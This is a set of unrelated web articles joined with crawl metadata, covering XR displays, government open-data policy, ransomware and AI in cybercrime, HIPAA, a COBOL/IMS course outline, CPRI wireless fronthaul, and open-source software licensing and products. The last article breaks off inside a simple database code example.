Arguably, at the low end of the spectrum, simple, large-size displays that are embedded in clothing could represent a potential not only for AR applications such as advanced shopping and navigation, but also for simple entertainment services, such as content streaming and gaming. The concept attracted some interest more than 10 years ago but never completely caught on – the challenges of embedding electronics into flexible textiles that require occasional cleaning persist. Now, the concept might find renewed interest as an extension to smartphones and smart watches.
At the high end, for individual users, companies are looking at the use of smart contact lenses that could even accommodate prescription vision correction. Mojo Vision’s Mojo Lens, for instance, is a smart contact lens with a microLED display. The company is looking at general AR applications and, with corporate markets in mind, sees its contact lens as an entry point to the metaverse. Intriguingly, other developers are targeting bio-sensing and drug-dispensing applications for contact lenses, so contact lenses could, theoretically, become multi-featured high-tech devices that address a number of consumer and healthcare needs.
A completely different question is where the augmentation should actually reside when shopping in stores or walking through museums, for instance. Should it occur on the smartphone, on smart glasses’ displays, or via holographic installations within stores or facilities? Axiom Holographics is one of the companies that offers such holographic systems, which can create a range of features, from table-size product displays to design prototypes. The company’s visuals still require dedicated glasses, which therefore limits their use to situations in which the audience can access such devices.
Holographic imagery that does not require devices at all has widespread use cases, such as in commercial settings ranging from retail space to conferences to showrooms. AV Concepts offers such applications that enable three-dimensional stage presentations which can find use in demonstrating new product applications, as well as performances by artists such as the late Tupac Shakur.
Holoxica is offering a range of 3D displays roughly resembling a range of sizes of current television sets, and Hypervsn is offering holographic smart walls. The advantages for commercial users are clear – viewers do not require dedicated devices, nor do they need to be compelled to activate their smartphones to see the XR-enabled content.
New inventions will enter the market. For example, in December 2021, Disney Enterprises received US patent 11,210,843 for a virtual-world simulator. Multiple projectors create 3D images, and simultaneous localisation and mapping (SLAM) adjusts them for visitors’ changing points of view. Guests at the attraction would therefore not require any devices, such as headsets or goggles, at all.
There will be a large market for XR headsets and AR smart glasses, but a wide range of solutions are competing within these product categories, and devices from other product categories are seeking to provide applications that can serve overlapping use cases. The race to succeed with interface technologies for XR systems has just begun – and we haven’t even scratched the surface. An even wider range of interface solutions will conceivably not only offer competing technologies, but will also be needed to fulfil the promise of truly immersive landscapes.
Martin Schwirn is the author of Small Data, Big Disruptions: How to Spot Signals of Change and Manage Uncertainty (ISBN 9781632651921). He is also senior adviser, strategic foresight at Business Finland, helping startups and incumbents to find their position in tomorrow’s marketplace. | <urn:uuid:923658a8-452a-489a-8f19-1716a585d8b2> | CC-MAIN-2022-40 | https://www.computerweekly.com/feature/Peeking-into-the-metaverse-Taking-a-look-at-VR-headsets-and-AR-smart-glasses | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336921.76/warc/CC-MAIN-20221001195125-20221001225125-00094.warc.gz | en | 0.934911 | 2,107 | 3.328125 | 3 |
The digital revolution, ubiquity of the internet and rise of big data have given government an unprecedented capability to produce, collect, utilize and disseminate a vast array of information and data. These trends have ushered in a new era of data-powered government innovation and citizen services based on the undeniable value in making government data widely available – to citizens, activists, companies, academics, and entrepreneurs. This is often referred to as the “open government” era, which thrives on government transparency, public accountability and citizen-centered services.
Consequently, the last 20 years have seen a transformation of public policies – legislative, regulatory, and administrative – grounded in the philosophy that access to and dissemination of government data is a public right and that any constraints on access hinder transparency and accountability. While there is broad recognition of the need to maximize access to government data, the types of government data are increasingly diverse and complex. For instance, there are many cases where the government collects or licenses private sector data, often combining this data with other data produced by the government. These datasets are often referred to as “hybrid data” or “privately curated data” – data licensed to or collected by the government that comprises both public and private sources. Access to and use of hybrid data is increasingly critical for government to transform data into actionable information.
Given the focus and challenges that come with this transformation, I offer some ideas that agencies and Congress should consider over the short and long term.
A more balanced open data policy should acknowledge and encourage government utilization of the most accurate and cost-effective data available, whether public, private, or a combination of the two. Technology mandates to release all datasets to the public domain fail to serve the broader public interest.
The Obama-era open government policies created a valuable framework for the maximization of purely government data, but these need to be applied carefully and updated to reflect the importance of hybrid data and the growing trends in technology and government data use.
In its 2013 Open Data Policy, the Obama administration expressed a preference for data formats that are “nonproprietary, publicly available, and [with] no restrictions… placed upon their use.”
While a preference for openness is appropriate, effective policy should strive to avoid the unintended consequences of moving from preference to technology mandate when applied to hybrid data. Mandates that make public–private initiatives economically unfeasible serve nobody’s interests.
Policymakers should caution against statutory restrictions that limit new and innovative technological choices simply because they happen to be proprietary. Instead, a better aim for legislative and regulatory oversight would be encouraging the market and public entities to develop the most efficient and effective data solutions possible while maintaining appropriate openness.
So how do we achieve this balance?
The first concrete step toward answering this question should take form in a GAO study of executive agencies’ use of public, private, and hybrid data sets. This study should specifically evaluate current data quality, the tools needed to improve data quality (including curation), and potential improvements to the collection and reporting of government-award data.
Fortunately, Congress has already provided the foundation to help guide such an initiative. A GAO study on data quality should build on the work and recommendations of OMB Circular A-76, the Commission on Evidence-Based Policymaking and the House Committee on Oversight and Government Reform’s report on the Foundations for Evidence-Based Policymaking Act of 2017 (H. Rept. 115-411) to ensure the proper roles of government- and private-sector innovations.
The Committee on Oversight and Government Reform’s report language on the OPEN Government Data Act is particularly instructive for what propositions a GAO study should test:
Open formats and open licenses are necessary components of a default of openness because they remove barriers to accessing and using the data. The presumptions expand upon, but do not alter existing openness requirements related to the treatment of any work of the United States Government under section 105 of title 17 or any other rights regimes.
The default is only that – a default. There are instances where it could be inappropriate for the government to impose open license requirements, such as for data that the government uses and maintains but does not own. For example, an agency might contract with a commercial data provider to obtain data that, if the agency attempted to collect on its own, the agency would need to spend significant time and resources verifying. This bill is not intended to prevent agencies from contracting with commercial data providers to obtain data under restricted terms, when such contract is in the public interest and is the most cost-effective way to meet the federal government’s needs.
Studying these propositions will provide the necessary tools to develop a balanced open data policy that achieves the widest possible ease of use and transparency for all forms of data.
The digital revolution is an opportunity to achieve maximum public transparency and illuminate with sunshine previously opaque government programs and policies.
Legislation that translates the preference for openness into laws and regulations is a positive step, but policymakers should ensure these laws and regulations do not enact a technology mandate with unintended and harmful consequences. The value of data is dramatically enriched by the quality of the data being provided. A tech mandate that effectively shuns the use of curated, or hybrid, data will usher in an era of data that is less reliable, less useful, less desirable, and more expensive. We cannot deprive government of the information and tools it needs to best serve and protect the public. It is time for the government, nonprofit, and private sectors to come together and formulate a balanced approach to the special case of “hybrid data.”
Rich Beutel is founder of Cyrrus Analytics, a government relations firm, and director of the Procurement Roundtable. He is also on the executive committee of ACT-IAC, working to implement reforms in IT acquisitions and to accelerate the cloud first mandate. Beutel served for over 10 years on Capitol Hill. Most recently, he was the lead acquisition and procurement policy counsel for Chairman Darrell Issa (R-Calif.) of the House Oversight and Government Reform Committee. | <urn:uuid:02cc204c-bd28-44d6-824d-6a1d5d1da9af> | CC-MAIN-2022-40 | https://federalnewsnetwork.com/commentary/2018/06/harnessing-the-power-of-a-data-driven-government/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337398.52/warc/CC-MAIN-20221003035124-20221003065124-00094.warc.gz | en | 0.924048 | 1,347 | 2.65625 | 3 |
Forget the lone wolf or script kiddie cyberattacks of old, where individuals carried out malicious attacks just to prove they could. Cybercrime today is becoming professionalised, with enterprising criminals building lucrative illegal businesses by using more sophisticated techniques in their attacks, being more ambitious in who they target, and even selling or licensing their own malware.
Recently, it has felt like not a day goes by without a cyber incident being reported. Increasingly, too, the cyberattacks of recent months have appeared more organised and targeted. Ciaran Martin, head of the new National Cyber Security Centre (NCSC), reported that UK public sector and infrastructure organisations are targeted by two significant cyberattacks every single day. In October 2016, it was discovered that at least 28 NHS trusts in England had been the victim of ransomware attacks. It has even been alleged that state-sponsored Russian hackers may have affected the outcome of the US presidential election.
Understandably, awareness of cyber security issues is therefore at an all-time high with consumers and business, while security experts are moving quickly to deploy the latest technologies to tackle this rapidly expanding threat landscape.
Man versus machine
Security researchers rely on the established technologies of machine learning and artificial intelligence (AI) which collect data from security attacks to build a database of known threat signatures. This allows them to use both genuine breaches and false positives to more accurately model threat behaviours and attack vectors in order to improve real-time detection of new as well as known threats.
The cooperation between man and machine through using these more sophisticated technologies creates a far more secure and efficient system. If an AI can be responsible for detecting and fixing vulnerabilities, it frees up researchers’ time to analyse the more complex threats, which they’ll in turn teach to the AI and add to the database.
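As a toy illustration of the signature-database idea described above — the payloads, hashes and labels below are invented, and real detection engines rely on far richer features and models than exact hashes:

```python
import hashlib

# Invented signature database: SHA-256 digests of known-bad payloads
# mapped to threat labels. Real engines use byte patterns, behavioural
# features and ML-derived models rather than exact digests.
KNOWN_BAD = {
    hashlib.sha256(b"drop table users; --").hexdigest(): "SQLi-probe",
    hashlib.sha256(b"powershell -enc JAB...").hexdigest(): "Encoded-PS",
}

def classify(payload: bytes) -> str:
    """Return the label of a known threat, or 'unknown' for a miss."""
    return KNOWN_BAD.get(hashlib.sha256(payload).hexdigest(), "unknown")

print(classify(b"drop table users; --"))  # -> SQLi-probe
print(classify(b"totally new payload"))   # -> unknown
```

A miss ("unknown") is precisely the case handed off to human analysts, whose verdict is then fed back into the database — the man-and-machine loop the article describes.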
However, there is concerning potential for AI to be misused – or turned against us. In the hands of criminals, off the shelf machine learning algorithms and AI code are already being used to improve the effectiveness of attacks and to stay ahead of detection.
Phishing attacks, for instance, where publicly available personal data is used to create a fake email with a malicious link or attachment, could be rendered far more convincing with the addition of AI. The AI could tailor phishing messages to mimic the writing style of the victim making a target far more likely to be convinced to click on malicious links or open unsolicited attachments.
Additionally, AI and machine learning technologies are used by cybercriminals to try to stay one step ahead of security defences by continually altering the code to avoid detection or providing it with improved attack methods. We have already seen the first AI vs AI cybersecurity battles waged in the lab and, with AI now a powerful tool in cybercriminals’ arsenal, in the real world.
Ransomware makes a mint
2016 was dubbed ‘The Year of Ransomware’, with the likes of Locky, Cerber and TeslaCrypt among the most prevalent malware strains identified. But this was only the tip of the iceberg. Over the course of 2016, Avast detected more than 150 new ransomware strains and in 2017, this has already more than doubled. The reason for the rapid proliferation of ransomware families is simply the success of this malware model for monetisation purposes.
Not only are criminals able to exploit the immediate victim for payment, but they now sometimes offer an innovative alternative to paying where victims recommend two other contacts to receive the malware instead, taking advantage of social engineering tactics to expand their malware distribution base more widely. It is usually the case that no matter what option a victim chooses – whether to pay or not, whether to pass on the malware to contacts or not – they will still lose their files and possibly access to their PC altogether.
Experts tracking the development of the most prolific malware families have noted cybercriminals spending time adding new languages to fool more victims, and regularly updating their code to make it harder for security experts to prevent and mitigate – especially if the ransomware has already been activated on a user’s PC.
For consumers, ransomware can cripple their device and forever erase their most precious files. For businesses, an attack can expose them not only to privacy law breaches and data protection issues but also to a mass clean-up operation and longstanding reputational damage.
Show me the money!
What’s more concerning is that wannabe cybercriminals today need not be skilled hackers. There are now more options than ever to create their own malware if they have only basic coding skills, including DIY open-source ransomware programs and licensed malware development kits, both easily found on hacking forums.
Even those without the necessary abilities can benefit from the RaaS (Ransomware as a Service) model. Automatically generated ransomware executables can be provided to anyone tempted to try their hand at cybercrime, creating a new army of budding cybercriminals. It is this availability of ‘malware for purchase’ which has changed unassociated instances of mischief making or theft into a real, lucrative underground economy with malware being a viable if illegal source of income.
Despite the huge risks it poses, there’s a knowledge gap around ransomware and how to protect against it. Avast’s small business arm, AVG Business, conducted research amongst SMBs specifically, which found that only 68% of small business owners had heard of ransomware, and only a third of those who thought they knew what it is could in fact accurately define it.
As with most cyber threats, education is, and will continue to be, the best line of defence against ransomware. Companies need to begin driving a strong security culture and emphasising best practices, such as keeping all software programmes up to date, as updates often contain security fixes, and thinking twice about unusual or unsolicited emails rather than automatically clicking on any links. For small businesses, which often lack dedicated IT support, having educated employees can be the best first line of defence.
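To make "thinking twice" about unsolicited emails concrete, the sketch below scores a message against two classic phishing red flags: urgent-sounding language and links whose domain does not match the sender's. The keyword list, example domains and scoring are invented for illustration and are nothing like a production filter:

```python
import re

# Invented list of urgency keywords often seen in phishing subjects.
URGENT_WORDS = {"urgent", "verify", "suspended", "invoice", "password"}

def suspicion_score(sender: str, subject: str, links: list[str]) -> int:
    """Toy heuristic: one point per red flag. Thresholds are invented."""
    score = 0
    sender_domain = sender.rsplit("@", 1)[-1].lower()
    # Red flag 1: urgent-sounding language in the subject line.
    if any(w in subject.lower() for w in URGENT_WORDS):
        score += 1
    # Red flag 2: any link whose host is outside the sender's domain.
    for url in links:
        m = re.match(r"https?://([^/]+)", url)
        if not m:
            continue
        host = m.group(1).lower()
        if host != sender_domain and not host.endswith("." + sender_domain):
            score += 1
    return score

print(suspicion_score("alerts@mybank.example",
                      "URGENT: verify your account",
                      ["http://mybank.example.attacker.test/login"]))  # -> 2
```

Real mail filters combine hundreds of such signals with sender reputation data and, increasingly, the machine learning models discussed earlier.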
New vulnerabilities, new defences
When smart devices, most notably smart phones and tablets, first came to prominence 10 years ago, cybersecurity practitioners were charged with the daunting task of securing organisational networks for this myriad of new access points. Once again, we see new technologies opening up potential avenues for cybercrime to exploit.
Internet of Things (IoT) devices are increasingly commonplace in day-to-day life, both at work and in our homes. The rapid availability of these devices to market has been matched by enthusiastic early adopters – but at the cost of securing these devices properly. Mass-produced hardware devices like webcams, printers and routers are increasingly being shipped without any security measures in place, making users vulnerable to attack. It’s clear why hackers love IoT devices – they are open doors to our private lives, our sensitive data, and our personal worlds.
Avast recently scanned 598,913 networks in the UK to understand the extent of the issue. The findings indicated that nearly half (47%) of all routers are vulnerable to a cyber breach, and 22% of all webcams and 5% of all printers were equally open to attack.
This highlights an important issue: that although the number of connected devices in our homes will continue to increase, the critical access point will remain the same – the router. The old standby of flashing firmware to keep pace with threats is inadequate, and the challenge is now for hardware manufacturers and security experts to work together to find a way to build security in from the ground up for smarter, safer devices.
As the threat landscape evolves, a collaborative, multi-layered approach will be necessary to keep our data safe. On the one hand, consumers and businesses need to take the initiative to understand the risks of using connected devices and online services and to take responsibility for keeping up with the key cybersecurity best practices around installing antivirus products, changing passwords and trying to spot fake emails, links and attachments.
On the other, cybersecurity experts will continue to focus on advancing the techniques and technologies to keep one step ahead of the criminals in this cyber game of cat and mouse. One thing that is certain is that, AI in the hands of the good guys is already a powerful and effective weapon against cybercrime, giving users the freedom to enjoy the benefits offered by the latest connected devices and technologies.
Ondrej Vlcek, EVP & GM, Consumer at Avast
Image Credit: Kim Britten / Shutterstock | <urn:uuid:3c15cad9-0bfe-49ba-a805-17b9ea418203> | CC-MAIN-2022-40 | https://www.itproportal.com/features/the-cybercrime-monetisation-system/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337668.62/warc/CC-MAIN-20221005203530-20221005233530-00094.warc.gz | en | 0.949074 | 1,724 | 3.0625 | 3 |
Health Insurance Portability and Accountability Act
The Health Insurance Portability and Accountability Act of 1996 (HIPAA) is a comprehensive federal regulation that governs healthcare data mobility, handling, and other aspects of patient records.
Among the Act’s five Titles, which oversee various parts of the healthcare landscape, is Title II, containing the Administrative Simplification (AS, or ASA) provisions. The ASA spells out how patient records may be handled by healthcare providers and healthcare insurers to enhance privacy and provide patients with informed consent over how their records are shared. It also establishes baseline national standards for electronic patient records and how they may be used.
In addition to HIPAA’s portability and simplification pillars, the regulation also includes a provision that aims to address the integrity of publicly-funded healthcare for the uninsured (Medicaid).
"HIPAA requires that you sign this form to consent to us sharing the results of your diagnostic tests with your primary care doctor, since she is out of our network. Unless you consent, we can't send the encrypted message at all."
Accessing IMS Databases from COBOL
The Accessing IMS Databases from COBOL course details the structure and use of an IMS/DB database. It gives examples of the DL/I data access language and shows how to use DL/I in COBOL programs to read and update IMS data. The concept of backup and recovery, particularly in the context of batch programming runs, is also explained.
COBOL Programmers who need to work with IMS databases.
The learner should have a solid knowledge of IMS database concepts and methods used to access an IMS database. This content can be obtained from the IMS Database course in the IMS curriculum.
After completing this course, the student will be able to:
- Describe how a COBOL program accesses an IMS database
- Code a COBOL program to reference and manipulate IMS database data
- Describe how IMS Database recovery is performed following a COBOL program error
Segment I/O Area
Produce a DL/I Call
Coding a Simple COBOL DL/I Batch Program
Extended DL/I Functions
DL/I Command Codes
DL/I Status Codes
How to Delete and Replace Segments
How to Access Lower Levels in a Hierarchy
IMS Backout and Recovery
Recovery Concepts and Procedures
Restart Concepts and Procedures | <urn:uuid:5fc563f1-3c16-4fed-9f49-19782644ef50> | CC-MAIN-2022-40 | https://bmc.interskill.com/course-catalog/COBOL-Accessing-IMS-Databases-from-COBOL.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.31/warc/CC-MAIN-20220927225413-20220928015413-00294.warc.gz | en | 0.797172 | 339 | 2.875 | 3 |
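As a taste of the "Produce a DL/I Call" topic above, the fragment below sketches how a batch COBOL program might issue a DL/I Get Unique (GU) call through the CBLTDLI interface. The PCB layout, segment name, field name and key value are invented for illustration and are not taken from the course materials:

```cobol
      *---------------------------------------------------------------
      * Hedged sketch only: PCB, segment, field and key are invented.
      * A DL/I 'GU' (Get Unique) call retrieves one CUSTOMER segment
      * into the segment I/O area via the CBLTDLI interface.
      *---------------------------------------------------------------
       WORKING-STORAGE SECTION.
       01  DLI-FUNCTION        PIC X(4)  VALUE 'GU  '.
       01  CUSTOMER-SSA.
           05  FILLER          PIC X(19) VALUE 'CUSTOMER(CUSTNO  = '.
           05  SSA-CUSTNO      PIC X(6)  VALUE '000123'.
           05  FILLER          PIC X     VALUE ')'.
       01  CUSTOMER-IO-AREA    PIC X(120).

       LINKAGE SECTION.
       01  CUSTOMER-PCB.
           05  PCB-DBD-NAME    PIC X(8).
           05  PCB-SEG-LEVEL   PIC X(2).
           05  PCB-STATUS-CODE PIC X(2).

       PROCEDURE DIVISION USING CUSTOMER-PCB.
           CALL 'CBLTDLI' USING DLI-FUNCTION
                                CUSTOMER-PCB
                                CUSTOMER-IO-AREA
                                CUSTOMER-SSA
           IF PCB-STATUS-CODE = SPACES
               DISPLAY 'CUSTOMER FOUND: ' CUSTOMER-IO-AREA
           ELSE
               DISPLAY 'DL/I STATUS: ' PCB-STATUS-CODE
           END-IF.
```

The four parameters – function code, PCB, segment I/O area and SSA – correspond directly to the Segment I/O Area, DL/I call and DL/I Status Codes topics listed above; a status code of spaces indicates the call succeeded.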
Common Public Radio Interface, or CPRI for short, is a standard initially developed by Nokia Siemens. It was soon joined by Ericsson, Huawei, NEC and Alcatel-Lucent, together comprising the five largest telecommunication equipment manufacturers in the world. With the inception of powerful handsets, wireless technologies have become more prevalent and consumer demand for high-speed data fierce. Wireless companies are constantly under pressure to increase capacity, and equipment suppliers to come up with novel methods to efficiently transport RF signals.
Traditionally, telecommunication equipment manufacturers like Ericsson and Alcatel-Lucent have sold equipment called Base Stations to wireless carriers. These are RF processing units that act as a gateway between carriers’ macro network (backhaul) and wireless fronthaul to consumer handsets. These analog setups have proven to be costly due to the large amount of energy, space, equipment and labor required to deploy. The largest associated cost is processing the high powered analog RF signals coming out of Base Stations. This is where CPRI comes in play.
Rather than transporting RF signals in analog form, equipment vendors offer a new solution: transporting wireless signals digitally as part of a fronthaul wireless network, commonly known as DAS (Distributed Antenna System). CPRI then, is a set of specifications set forth by equipment manufacturers in an effort to standardize the protocol between radio equipment control and radio equipment.
To make things easier to understand, RF base stations have been filling the role of radio equipment control and RF processing. They also conduct analog-to-digital (A/D) and digital-to-analog (D/A) conversions, leaving the distribution of fronthaul RF signals to 3rd party vendors. The inception of the CPRI standard means Base Stations can now concentrate on performing tasks like directing wireless traffic between carriers’ fronthaul and backhaul networks. RF processing and A/D processing are done at remote radio nodes. These nodes are now being connected to radio equipment control via fiber optic or Ethernet cable.
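Conceptually, what travels over a CPRI link is the radio waveform itself, digitized at the A/D stage into a stream of fixed-width I/Q samples. The toy sketch below quantizes a single tone into signed integer I/Q words; the tone, sample rate and scaling are invented for illustration, and real CPRI framing, line coding and control words are far more involved:

```python
import math

def quantize_iq(num_samples: int, freq_hz: float, sample_rate_hz: float,
                bits: int = 15) -> list[tuple[int, int]]:
    """Quantize a toy complex tone into signed fixed-width I/Q words.

    15-bit words are within the sample widths CPRI permits, but the
    tone, rates and scaling here are invented for illustration.
    """
    full_scale = 2 ** (bits - 1) - 1
    samples = []
    for n in range(num_samples):
        t = n / sample_rate_hz
        i = math.cos(2 * math.pi * freq_hz * t)   # in-phase component
        q = math.sin(2 * math.pi * freq_hz * t)   # quadrature component
        samples.append((round(i * full_scale), round(q * full_scale)))
    return samples

# First sample of a 1 MHz tone at an LTE-style 30.72 Msps rate:
print(quantize_iq(1, 1e6, 30.72e6)[0])  # -> (16383, 0)
```

It is these digital words, not high-powered analog RF, that the remote radio nodes exchange with the radio equipment control over fiber or Ethernet.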
With the inception of CPRI, typical wireless fronthaul networks now resemble your everyday LAN (Local Area Network), with standard point-to-point, star, and chained configurations feasible in the deployment of radio equipment. Obviously, RF balancing and propagation requirements remain among remote radio nodes, but the use of passive auxiliary components has been greatly reduced.
For more CPRI related documents please visit DASpedia Vault
DASpedia is currently seeking written contributions to our growing knowledge base of DAS & Small Cell technologies. Articles, white papers and presentations are all valid considerations. Product data sheets are also welcome. Editorial credit will be given. If you have something you or your organization would like to share, please feel free to submit it to email@example.com | <urn:uuid:decae86d-3efc-4977-aa35-e1a4db9a9a64> | CC-MAIN-2022-40 | https://daspedia.com/archives/2115 | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337516.13/warc/CC-MAIN-20221004152839-20221004182839-00294.warc.gz | en | 0.939107 | 576 | 3.234375 | 3 |
It is easy to see the impact that open source software has had on the developer community. A Google search for “open source” turns up over nineteen million results. That’s more than a similar search for “Oracle”, and nearly one-fifth as many as for “Microsoft”, the king of proprietary software.
This article will describe what open-source software is, and examine a few of the products that are out there on the open-source landscape.
What Is Open-Source Software?
According to the Open Source Initiative, Open-source software is any software that is distributed to the developer community with the source code. Traditionally, software vendors distribute only the binaries for their products, leaving developers in the dark as to the inner workings of the products they use. Because open-source software vendors distribute the source code, developers can readily improve the product by creating patches for problems, or by making enhancements.
Although most open-source software is free to the community, there are sometimes strings attached. Let’s take a look at the most common types of licensing for open-source software.
GNU General Public License (GPL)
Under the General Public License, or GPL, the licensee is free to distribute or modify the software product, provided that the modifications, both in binary and source code form, remain free to the public under the terms of the GPL. In addition, the licensee must provide all build scripts, interface definitions, and installation scripts necessary to compile and install the program.
The GPL makes no provision for a warranty of any kind, and this fact must be displayed prominently in the source code, as well as on the user interface of the program, if applicable.
Works that contain the original software, or are derived from it, must fall under the GPL. Thus, no one is allowed to create proprietary software based on a GPL-licensed product, ensuring that free software remains free.
Anyone who modifies and redistributes software under the GPL must prominently display the fact that the new version is different than the older version. Thus, if a new version of the product is not up to par, that fact won’t tarnish the reputation of the original product.
GNU Lesser General Public License (LGPL)
The Lesser General Public License (LGPL), the successor to the GNU Library General Public License, is the GPL equivalent for open-source software libraries. Under this license, the libraries fall under provisions similar to the GPL: the libraries themselves, and any works directly based on them, in both source code and binary form, must be freely available to the public. However, unlike the GPL, programs that simply use the libraries can be excluded from the terms of the LGPL, and can be proprietary.
Because the LGPL is less restrictive, free software developers who license software under its terms enjoy less of an advantage over those who are paid for their software. However, the LGPL still provides some benefits to the open-source community. First, by providing libraries under the LGPL rather than the GPL, free software developers can encourage the use of their libraries as a default standard in the industry. Second, encouraging the use of the libraries may help to speed the adoption of other free software, such as operating systems, even by paid software vendors.
Mozilla Public License
The Mozilla Public License, or MPL, is very similar to the GPL in spirit, with a few exceptions. First of all, this license is more precise from a legal standpoint, and specifically addresses areas, such as intellectual property rights, license termination, government licensing, and liability issues, that are not explicitly mentioned in the GPL.
Unlike the GPL, the MPL allows the licensee to create larger works that include the licensed software, while still allowing those programs to be distributed for payment, as long as the portion of the code licensed under the MPL remains covered by the MPL.
Many developers are now embracing this more strictly defined license for their open-source software, rather than continuing to use the GPL. The clause allowing larger works that use the licensed product is, as with the LGPL, a boon for developers wishing to make their products a de facto industry standard.
Other Open-Source Licenses
There are many other licenses available to those who create open-source software. The BSD and MIT licenses were created to address products developed at the University of California and MIT, respectively. These licenses are very similar, and are available through the OSI as templates for those wishing to use them for their own open-source products.
Other licenses address open-source products based on software written by particular organizations. For example, the Apache and IBM licenses cover software written for the Apache Foundation and IBM, or products utilizing software developed by them.
The bottom line is that most open-source software is free, as long as you distribute any modifications you make under the terms of the original license agreement, and no warranty is provided, unless otherwise stated, by the developer of the product.
How Do Open-Source Developers Make Money?
If open-source software is free, how can any software developer hope to make money on it? They do so by providing value-added services and products that are not covered by the original licensing agreements. Because open-source software is usually distributed “as-is”, software developers can earn income by providing warranty coverage for the products they develop.
Some vendors provide support for open-source products for a fee. Many provide various levels of support, just as commercial software vendors do, ranging in price and quality from email-only support up to on-site consulting and troubleshooting.
Open-source software is largely developed by volunteers, and developers are notorious for neglecting documentation beyond that found in the source code. Many open-source software developers therefore provide excellent documentation for a nominal fee. Most provide documentation in electronic form, but some will provide hard-copy versions for a larger fee.
Although open-source licenses guarantee licensees the right to receive source code for the products licensed, they do allow licensors to charge for such distributions. Most open-source software, and its associated source code, can be downloaded from the Internet free of charge, but there are many vendors who will provide distributions, sometimes with additional documentation or other bonuses, on CD for a fee.

Now that we have defined open-source software and discussed how it is licensed, let’s have a look at the kinds of products available to developers.
By far, the eight-hundred-pound gorilla of the open-source operating system community is Linux. This UNIX-like operating system is estimated to have up to 27 million users worldwide, according to the OSI, although it is practically impossible to verify exactly how many users are out there. Developed by Linus Torvalds as an academic project in the early 1990s, Linux has now grown into a corporate tool used by Fortune 500 companies, and distributed on servers by prominent server vendors, such as IBM.
Linux comes in many flavors, including Red Hat, Mandrake, Slackware, Turbo Linux, SuSE, and others. By far, the most popular version is Red Hat, which is widely distributed by commercial software vendors. This flavor of Linux, unlike some of the others, offers excellent support and documentation, and enjoys the largest following of any Linux flavor.
Remaining true to its MINIX roots, Linux still has a command-line interface; however, open-source desktops such as GNOME and KDE, which provide Windows-like functionality, are available.
With the advent of open-source productivity tools, such as StarOffice and OpenOffice, Linux is even beginning to penetrate the desktop market. The number of applications available for Linux is growing, attracting many who were formerly Windows users out of necessity, but who can now find the programs they need in the open source community.
One downside to Linux, according to Internet Week, is the lack of quality development tools for the platform. According to a survey by research firm Evans Data Corp., 25% of developers surveyed said that critical development tools, such as compilers, are only adequate, or need work, on Linux. Despite this, Linux’s stability and dependability have attracted a huge following.
For more information on Linux, visit http://www.linux.org.
BSD is a UNIX-based operating system descended from code originally written at UC Berkeley. Although it is not as popular as it once was, due to the arrival of Linux, BSD and its many flavors are still a notable presence on the open source scene.
Various flavors of BSD still exist, including FreeBSD, NetBSD, OpenBSD, and Darwin. The momentum behind BSD has decreased sharply due to the disappearance of several of the companies that provided support and patches for the various operating systems. Also, the popularity of Linux has led more developers to write code for that operating system, leaving BSD languishing.
For more information about BSD, visit http://www.bsd.org/
Web Servers and Application Servers
Apache HTTP Server
The Apache HTTP server is, by far, the most popular web server on the World Wide Web. According to a Netcraft survey (http://news.netcraft.com/archives/web_server_survey.html), Apache leads the market, running on over 67% of web servers. This compares with only 21% for Microsoft, 3% for the Sun ONE server, and 1.6% for Zeus.
Apache was originally created at the National Center for Supercomputing Applications, under a different name. When development on that HTTP server stopped in 1994, some of the major players in the project met to apply patches to the product and create a more stable release. This new release, which branched from the original NCSA server, became the most widely-used server on the web today, and is one of the open source movement’s biggest success stories.
For more information about the Apache HTTP server, visit http://www.apache.org/.
With the arrival of Java servlets and JSP on the scene, it was quite natural that the people who brought you the Web’s most popular web server would also build a servlet engine. Tomcat, which is Sun Microsystems’ acid test for the servlet and JSP specification, is a part of the Apache Jakarta Project, a project dedicated to providing open-source, Java-based software solutions. Tomcat is available as a module that is pluggable into the Apache modules framework, but may also be used for standalone servlet and JSP development. Tomcat does not support the full J2EE specification, but it is sometimes used as the default servlet container for other open-source products that do support the full spec.
For more information about Tomcat, visit http://jakarta.apache.org/tomcat.
JBoss is an open-source application server that supports the full J2EE specification. As mentioned above, JBoss incorporates the Tomcat servlet container as part of its code. For a closer look at JBoss and its features, see “Jump Into JBoss” on this site, or visit http://www.jboss.org/.
Most enterprise solutions require some sort of database to store their data. However, the high licensing fees, complexity, security issues, and high cost of database administration for commercial databases, such as Oracle and MS SQL Server, have made open-source alternatives attractive to a growing number of businesses. The two major players in this arena are PostgreSQL and MySQL, which we’ll examine in the following sections.
PostgreSQL is the open-source descendant of the Postgres database, created at the University of California at Berkeley. It incorporates many features found in commercial databases that developers have come to expect, such as complex queries, triggers, foreign keys, views, transactional integrity, and replication. The database can also be extended, allowing developers to define new data types, functions, operators, aggregate functions, and even procedural languages. This last item is perhaps the most intriguing for developers accustomed to developing in PL/SQL, Tcl, Perl, and Python, because PostgreSQL allows stored procedures to be implemented in these languages. Although not every feature of each language is included in PostgreSQL, the feature sets are still powerful, familiar to those who have used the languages before, and, of course, always improving.
For more information about PostgreSQL, visit http://www.postgresql.org/.
MySQL is a powerful but simple database geared toward applications with high transaction volumes and large quantities of data. This performance and scalability, however, come at the price of feature richness. MySQL does not currently support stored procedures or triggers, although the two features are slated for versions 5.0 and 5.1, respectively. Also, MySQL constrains developers to the SQL-92 specification, which lacks some of the SQL capabilities found in commercial databases.
The administration for MySQL is very simple. Administration is done within the MySQL command-line client, which is similar to SQL*Plus for Oracle. Also, numerous command-line utilities exist for performing various administrative functions, such as loading data, and repairing and analyzing tables.
Although MySQL lacks some features, it is capable of handling large volumes of data. According to the latest MySQL documentation, the database has been used in production with thousands of tables and millions of records without significant performance issues.
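Applications reach databases like PostgreSQL and MySQL through standard client interfaces. As an illustrative sketch (using Python's DB-API with the standard-library sqlite3 driver purely so the example is self-contained; the PostgreSQL and MySQL client libraries follow the same connect/cursor/execute/fetch pattern), a typical create, insert, and query cycle looks like this:

```python
# Illustrative sketch of the Python DB-API. The sqlite3 module is used
# only so the example runs anywhere without a database server; swap in a
# PostgreSQL or MySQL driver and the calling pattern stays the same.
import sqlite3

conn = sqlite3.connect(":memory:")
cur = conn.cursor()
cur.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)")
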